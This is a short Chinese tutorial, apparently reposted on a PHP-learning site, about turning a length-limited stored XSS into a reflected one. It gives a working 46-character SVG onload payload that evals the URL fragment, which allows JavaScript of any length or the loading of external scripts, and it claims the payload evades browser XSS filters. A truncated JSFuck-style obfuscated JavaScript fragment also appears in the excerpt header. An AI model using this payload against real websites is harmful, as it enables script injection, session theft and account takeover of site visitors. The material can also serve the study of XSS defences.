来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] 把储存型XSS变成反射型XSS 突破长度限制LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[...
|
把储存型XSS变成反射型XSS 突破长度限制
LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2013-09-17 19:08
如果我们遇到了有长度限制怎么办?难道就真的无法利用然后放弃吗?其实我们可以将有限空间发挥出无限的威力。我最近研究了一种 把储存型XSS变成反射型XSS 的思路。但是你输入的地方最少要支持 46 个字符。
代码如下:
<svg/onload=eval(location.hash.split('#')[1])>
将上面这段代码插入至少可以输入46个字符的地方,然后访问
http://example.com/#alert();
或者
http://example.com/#(加载一段外部JS)
即可执行无限长度JS代码 , 缺点就是变成了反射型,好消息是兼容所有浏览器,不会被浏览器的Filter干掉
如果各位看官还有更短的姿势,欢迎共享讨论。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
